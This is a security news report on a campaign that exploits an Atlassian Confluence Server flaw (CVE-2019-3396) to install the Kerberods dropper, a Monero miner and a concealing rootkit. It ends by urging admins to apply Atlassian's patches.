Hackers attack Confluence Servers, hijack power for cryptocurrency mining. Illicit Monero mining is the goal. According to Trend Micro, attackers are harnessing CVE-2019–3396, a bug present in the Widget Connector macro in Atlassian Confluence Server, which permits path traversal and remote code execution via server-side injection.
Atlassian released a patch on March 20, 2019, to resolve the security flaw alongside an accompanying fix for CVE-2019-3395, a WebDAV endpoint issue which permits attackers to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance.
However, it seems that unpatched Confluence systems are being widely exploited in the new campaign, which focuses on mining Monero.
The researchers, Augusto Remillano II and Robert Malagad, say that CVE-2019–3396 was previously being used to drop the Gandcrab ransomware, and now, the bug is also being utilized to drop rootkits and cryptocurrency mining malware onto vulnerable systems.
The infection chain begins with a remote command which is sent to fetch a shell script from Pastebin. This script contains kill process capabilities and is able to download and execute a second shell script, again from a Pastebin source, eventually leading to a third Pastebin shell script download.
A Trojan dropper, known as Kerberods, is then fetched and installed. This malware drops the “khugepageds” cryptocurrency miner — flagged as Coinminer.Linux.MALXMR.UWEJI — alongside the rootkit component.
The rootkit, which is designed to mask the cryptocurrency miner’s activities, is dropped in a code format which is then compiled in GCC.
Kerberods is also able to propagate over networks via SSH through the exploit of CVE-2019-1003001 and CVE-2019-1003000, which are Jenkins automaton server security flaws that can result in arbitrary code execution.
Both Kerberods and its rootkit use custom packers to make analysis more challenging. The rootkit is not only able to hide the mining process but is also able to forge the infected machine’s CPU usage — in turn, concealing one of the main indicators of a cryptocurrency mining malware operation.
Given the active exploit of Confluence Servers in the wild, it is recommended that admins apply Atlassian’s patches without delay.